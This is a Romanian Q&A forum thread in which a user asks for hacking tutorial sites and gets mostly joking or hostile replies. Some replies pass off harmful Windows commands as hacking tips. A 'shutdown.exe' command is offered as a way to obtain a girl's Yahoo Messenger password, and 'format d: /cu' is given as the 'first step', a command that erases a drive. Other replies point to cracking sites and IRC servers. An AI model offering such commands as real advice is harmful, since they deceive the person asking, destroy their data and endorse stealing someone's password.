| lupu_1730 a întrebat:

Vreau niste siituri rusesti/englezesti/americane etc de tutorial hacker
va rog

11 răspunsuri:
kongeriket
| kongeriket a răspuns:

Nu există site-uri de tutoriale hacking, în general căci atunci la ce-ar mai fi buni şi speciali hacker-ii dacă toată lumea ştie cum se face.
În fine, mai e şi diferenţa de noanţă a termenului. Unul e hacker-ul şi alta e CRACK-erul. Cred că pe tine cracking-ul te interesează.
Hacks.ws şi serverele de private de IRC sunt principalele surse.
Mai multe nu-ţi spun c-ar trebui să te împuşc.
Spor la căutat!

| Pedala a răspuns:

Du-tetare.com

| ChristianAthletikتايلور a răspuns:

Bai Smoker te pui cu hackeriile ai?

| Lol_1641 a răspuns:

Have Funn: SWEgUHVsYSEgPSkpIG9Jbw0KaHR0cDovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PVl1Q01ranZtVGRV

| lupu_1730 explică:

Congeriket=> stiu diferenta dintrre hacker si cracker
dar ma intereseaza hackerul
si u faci parte din ceva grup de hackeri

anonim_4396
| anonim_4396 a răspuns:

Asa ca sa aflii parola la aidiu unei printese din lista te duci la start dai pe butonu ala pa care scrie Run si o sa apara o fereastra si acolo scrii asa shutdown. exe -s -c "id mess printesa" -t 30 si in 2 minute ai parola ei big grin o sa se deschida o fereastra si o sa iti arate id si parola big grin

anonim_4396
| anonim_4396 a răspuns:

Da-mi un mail la admin@ratati.org si discutam

anonim_4396
| anonim_4396 a răspuns:

Primul pas
start - run - cmd - format d: /cu

| soni2001 a răspuns:

La yahoo mesenger adauga-ma cu numele de Hacker_Card123 prima data funda

| bogdannbv_3805 a răspuns:

Asa ca sa aflii parola la aidiu unei printese din lista te duci la start dai pe butonu ala pa care scrie Run si o sa apara o fereastra si acolo scrii asa shutdown.exe -s -c "id mess printesa" -t 30 si in 2 minute ai parola ei big grin o sa se deschida o fereastra si o sa iti arate id si parola big grin

| MrCrackworld a răspuns:

Cel mai tare site de hacking 100 automatozat! http://mrcrackworld.blogspot.com